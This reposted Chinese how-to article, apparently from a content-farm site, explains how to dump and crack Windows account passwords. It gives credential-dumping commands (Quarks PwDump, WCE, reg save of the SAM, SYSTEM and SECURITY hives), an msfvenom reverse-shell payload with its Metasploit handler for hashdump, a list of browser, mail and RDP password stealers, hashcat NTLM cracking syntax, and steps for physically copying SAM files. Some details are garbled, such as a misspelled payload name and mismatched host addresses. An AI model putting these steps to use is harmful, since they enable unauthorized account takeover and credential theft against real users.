windows 绕过开机密码 Windows密码获取和破解

导读 hello大家好,我是大学网网小航来为大家解答以上问题,windows,绕过开机密码,Windows密码获取和破解很多人还不知道,现在让我们一起来看...

hello大家好,我是大学网网小航来为大家解答以上问题,windows,绕过开机密码,Windows密码获取和破解很多人还不知道,现在让我们一起来看看吧!

本文只是简单的讲明密码获取和破解

具体的操作细节均以模糊或具体代码混淆等方式避开

如有兴趣请自行研究,本文不做细说~~~

获取思路:

Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~

密码获取工具:

gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……

Quarks PwDump:

是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。

Quarks PwDump -dh1 // 导出本地哈希值Quarks PwDump -dhdc // 导出内存中域账户哈希值Quarks PwDump -dhd // 导出域哈希值(指定NTDS文件)

WCE:

是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一

wce -a //获取所有账户哈希值

reg命令:导出密码文件

通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中

reg save hklm\sam sam.hivereg save hklm\system system.hivereg save hklm\security security.hive

命令执行后将会将文件保存在本地~

PowerShell获取:

PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码

MSF反弹hashdump及mimikatz获取:

通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~

> msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe

> use exploit/multi/handler> set PAYLOAD windows/meterpreter/reverse_tcp> set LHOST 192.168.2.0> set LPORT 443> exploit

其它小工具

下列小工具在Windows平台运行就会获得相关的用户凭证……

mailpv:获取mail密码

mspass:获取MSN密码

pst_password:获取Outlook密码

IE PV:获取IE浏览器缓存密码

各类浏览器密码获取工具

passwordfox:获取Firefox浏览器凭证

chromepass:获取谷歌浏览器凭证

无线网络密码获取工具

远程桌面密码获取:

rdpv —— cmdkey/list —— netpass.exe

破解密码哈希值

在线破解:

ophcrack破解:

导入哈希值,加载Tables,执行Crack~

hashcat破解:

最流行的、最快的密码破解工具

破解:

将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:

hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username

-m 1000 表示破解密码类型为NTLM

-a 0 表示采用字典破解

-o [feilname].txt 表示将破解后的文件输出到指定的文件中

--remove win.hash 表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解

password.lst 密码字典文件

物理获取密码

获取SAM和SYSTEM文件

文件通常在C:\Windows\System32\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAM SYSTEM SECURITY 三个文件

导入文件

使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~

破解哈希密码

导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解

本文就为大家讲解到这里,希望对大家有所帮助。

郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时候联系我们修改或删除,多谢。